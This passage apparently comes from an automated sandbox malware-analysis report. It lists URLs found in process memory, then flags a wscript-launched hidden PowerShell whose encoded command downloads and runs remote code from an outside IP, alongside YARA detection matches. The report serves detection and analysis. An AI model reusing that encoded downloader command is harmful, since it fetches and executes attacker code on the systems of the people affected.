    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
    Source: mirroring_hangouts.js.1.drString found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/abs-capture-time
    Source: mirroring_hangouts.js.1.drString found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/generic-frame-descriptor-00
    Source: mirroring_hangouts.js.1.drString found in binary or memory: http://www.webrtc.org/experiments/rtp-hdrext/video-layers-allocation00
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
    Source: Web Data.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: manifest.json0.1.dr, d674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp.2.dr, manifest.json2.1.dr, 4469433b-5b42-45c3-bdb2-5ead1408960e.tmp.2.drString found in binary or memory: https://accounts.google.com
    Source: craw_window.js.1.drString found in binary or memory: https://accounts.google.com/MergeSession
    Source: explorer.exe, 0000000C.00000000.9962482225.00000000082BD000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppA
    Source: explorer.exe, 0000000C.00000000.9886666253.00000000043E1000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/Vh5j3kx
    Source: explorer.exe, 0000000C.00000000.9958911327.0000000007740000.00000002.00000001.sdmp, powershell.exe, 00000016.00000002.10534697451.000001C947600000.00000002.00000001.sdmpString found in binary or memory: https://aka.ms/hcsadmin
    Source: explorer.exe, 0000000C.00000000.9886666253.00000000043E1000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/odirm8
    Source: powershell.exe, 00000016.00000002.10491858613.000001C92EE31000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: explorer.exe, 0000000C.00000000.9962249157.0000000008284000.00000004.00000001.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
    Source: explorer.exe, 0000000C.00000000.9962249157.0000000008284000.00000004.00000001.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
    Source: mirroring_hangouts.js.1.drString found in binary or memory: https://aomediacodec.github.io/av1-rtp-spec/#dependency-descriptor-rtp-header-extension
    Source: manifest.json0.1.dr, d674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp.2.dr, manifest.json2.1.dr, 4469433b-5b42-45c3-bdb2-5ead1408960e.tmp.2.drString found in binary or memory: https://apis.google.com
    Source: mirroring_common.js.1.drString found in binary or memory: https://apis.google.com/js/client.js
    Source: Web Data.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: d674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp.2.dr, 4469433b-5b42-45c3-bdb2-5ead1408960e.tmp.2.drString found in binary or memory: https://clients2.google.com
    Source: mirroring_hangouts.js.1.drString found in binary or memory: https://clients2.google.com/cr/report
    Source: manifest.json.1.dr, manifest.json2.1.drString found in binary or memory: https://clients2.google.com/service/update2/crx
    Source: d674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp.2.dr, 4469433b-5b42-45c3-bdb2-5ead1408960e.tmp.2.drString found in binary or memory: https://clients2.googleusercontent.com
    Source: mirroring_hangouts.js.1.drString found in binary or memory: https://clients6.google.com
    Source: manifest.json0.1.dr, manifest.json2.1.drString found in binary or memory: https://content.googleapis.com
    Source: powershell.exe, 00000016.00000002.10531052608.000001C93EFDD000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000016.00000002.10531052608.000001C93EFDD000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000016.00000002.10531052608.000001C93EFDD000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
    Source: common.js.1.dr, mirroring_cast_streaming.js.1.drString found in binary or memory: https://crash.corp.google.com/samples?reportid=&q=
    Source: mirroring_hangouts.js.1.drString found in binary or memory: https://creativecommons.org/publicdomain/zero/1.0/.
    Source: mirroring_common.js.1.drString found in binary or memory: https://docs.google.com
    Source: Web Data.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: Web Data.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: Web Data.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: manifest.json0.1.dr, manifest.json2.1.drString found in binary or memory: https://feedback.googleusercontent.com
    Source: manifest.json0.1.dr, manifest.json2.1.drString found in binary or memory: https://fonts.googleapis.com;
    Source: manifest.json0.1.dr, manifest.json2.1.drString found in binary or memory: https://fonts.gstatic.com;
    Source: powershell.exe, 00000016.00000002.10493820703.000001C92F054000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: angular.js.1.drString found in binary or memory: https://github.com/angular/material
    Source: craw_background.js.1.dr, craw_window.js.1.drString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
    Source: mirroring_hangouts.js.1.drString found in binary or memory: https://github.com/madler/zlib/blob/master/zlib.h
    Source: mirroring_hangouts.js.1.drString found in binary or memory: https://hangouts.clients6.google.com
    Source: manifest.json0.1.dr, manifest.json2.1.drString found in binary or memory: https://hangouts.google.com/
    Source: mirroring_hangouts.js.1.drString found in binary or memory: https://hangouts.google.com/_/logpref
    Source: explorer.exe, 0000000C.00000000.9998559475.000000000E14F000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.9996142967.000000000DE11000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
    Source: explorer.exe, 0000000C.00000000.9996255168.000000000DE39000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
    Source: explorer.exe, 0000000C.00000000.9941513322.000000000568F000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld24
    Source: explorer.exe, 0000000C.00000000.9996142967.000000000DE11000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
    Source: explorer.exe, 0000000C.00000000.9996255168.000000000DE39000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
    Source: explorer.exe, 0000000C.00000000.9996142967.000000000DE11000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033q
    Source: explorer.exe, 0000000C.00000000.9998559475.000000000E14F000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
    Source: mirroring_common.js.1.drString found in binary or memory: https://meet.google.com
    Source: mirroring_hangouts.js.1.drString found in binary or memory: https://meetings.clients6.google.com
    Source: powershell.exe, 00000016.00000002.10531052608.000001C93EFDD000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: d674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp.2.dr, 4469433b-5b42-45c3-bdb2-5ead1408960e.tmp.2.drString found in binary or memory: https://ogs.google.com
    Source: manifest.json.1.dr, manifest.json1.1.dr, craw_window.js.1.drString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
    Source: mirroring_hangouts.js.1.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
    Source: mirroring_hangouts.js.1.drString found in binary or memory: https://preprod-hangouts-googleapis.sandbox.google.com
    Source: manifest.json.1.dr, manifest.json1.1.dr, craw_window.js.1.drString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
    Source: Web Data.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
    Source: Web Data.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: d674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp.2.dr, 4469433b-5b42-45c3-bdb2-5ead1408960e.tmp.2.drString found in binary or memory: https://ssl.gstatic.com
    Source: explorer.exe, 0000000C.00000000.9999011237.000000000E1F7000.00000004.00000001.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
    Source: messages.json134.1.dr, feedback.html.1.drString found in binary or memory: https://support.google.com/chromecast/answer/2998456
    Source: messages.json134.1.dr, feedback.html.1.drString found in binary or memory: https://support.google.com/chromecast/troubleshooter/2995236
    Source: d674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp.2.dr, 4469433b-5b42-45c3-bdb2-5ead1408960e.tmp.2.drString found in binary or memory: https://update.googleapis.com
    Source: explorer.exe, 0000000C.00000000.9962249157.0000000008284000.00000004.00000001.sdmpString found in binary or memory: https://wns.windows.com/EM0x
    Source: craw_background.js.1.dr, craw_window.js.1.drString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
    Source: manifest.json0.1.dr, d674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp.2.dr, manifest.json2.1.dr, 4469433b-5b42-45c3-bdb2-5ead1408960e.tmp.2.drString found in binary or memory: https://www.google.com
    Source: manifest.json.1.dr, manifest.json1.1.drString found in binary or memory: https://www.google.com/
    Source: craw_window.js.1.drString found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
    Source: Web Data.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: craw_window.js.1.drString found in binary or memory: https://www.google.com/images/cleardot.gif
    Source: craw_window.js.1.drString found in binary or memory: https://www.google.com/images/dot2.gif
    Source: craw_window.js.1.drString found in binary or memory: https://www.google.com/images/x2.gif
    Source: craw_background.js.1.drString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
    Source: mirroring_hangouts.js.1.drString found in binary or memory: https://www.google.com/log?format=json&hasfast=true
    Source: feedback_script.js.1.drString found in binary or memory: https://www.google.com/tools/feedback
    Source: manifest.json0.1.dr, manifest.json2.1.drString found in binary or memory: https://www.google.com;
    Source: d674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp.2.dr, 4469433b-5b42-45c3-bdb2-5ead1408960e.tmp.2.dr, craw_background.js.1.dr, craw_window.js.1.drString found in binary or memory: https://www.googleapis.com
    Source: manifest.json.1.dr, manifest.json1.1.drString found in binary or memory: https://www.googleapis.com/
    Source: manifest.json0.1.dr, manifest.json2.1.drString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
    Source: manifest.json.1.dr, manifest.json1.1.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
    Source: manifest.json.1.dr, manifest.json1.1.drString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
    Source: manifest.json0.1.dr, manifest.json2.1.drString found in binary or memory: https://www.googleapis.com/auth/hangouts
    Source: manifest.json0.1.dr, manifest.json2.1.drString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
    Source: manifest.json0.1.dr, manifest.json2.1.drString found in binary or memory: https://www.googleapis.com/auth/meetings
    Source: manifest.json.1.dr, manifest.json1.1.drString found in binary or memory: https://www.googleapis.com/auth/sierra
    Source: manifest.json.1.dr, manifest.json1.1.drString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
    Source: manifest.json0.1.dr, manifest.json2.1.drString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
    Source: mirroring_common.js.1.drString found in binary or memory: https://www.googleapis.com/calendar/v3
    Source: mirroring_common.js.1.drString found in binary or memory: https://www.googleapis.com/hangouts/v1
    Source: d674daca-5fce-49f8-9af4-0086ecb4b5e5.tmp.2.dr, 4469433b-5b42-45c3-bdb2-5ead1408960e.tmp.2.drString found in binary or memory: https://www.gstatic.com
    Source: mirroring_hangouts.js.1.drString found in binary or memory: https://www.gstatic.com/duo/desktop/wasm/duocore/20210419/duocore_split_wasm_module.js
    Source: common.js.1.drString found in binary or memory: https://www.gstatic.com/hangouts_echo_detector/release/%
    Source: manifest.json0.1.dr, manifest.json2.1.drString found in binary or memory: https://www.gstatic.com;
    Source: explorer.exe, 0000000C.00000000.9941513322.000000000568F000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.9999011237.000000000E1F7000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
    Source: explorer.exe, 0000000C.00000000.9999011237.000000000E1F7000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpyu1SPS
    Source: explorer.exe, 0000000C.00000000.9999011237.000000000E1F7000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.9997540215.000000000DFF5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
    Source: explorer.exe, 0000000C.00000000.9997540215.000000000DFF5000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpL
    Source: unknownDNS traffic detected: queries for: fa000000064.resources.office.net
    Source: global trafficHTTP traffic detected: GET /click.php HTTP/1.1Host: 185.244.41.28Connection: Keep-Alive

    E-Banking Fraud:

    barindex
    Malicious encrypted Powershell command line foundShow sources
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=Jump to behavior

    System Summary:

    barindex
    Wscript starts Powershell (via cmd or directly)Show sources
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=Jump to behavior
    Source: 00000013.00000003.10199880080.000001AF430F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000016.00000002.10523891301.000001C9302F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10197684686.000001AF430F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10199731855.000001AF430F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000002.10205510794.000001AF433E5000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000002.10209412160.000001AF44E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000016.00000002.10483734570.000001C92CFC0000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000013.00000002.10204462615.000001AF430E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000013.00000002.10204462615.000001AF430E7000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10197150129.000001AF43121000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
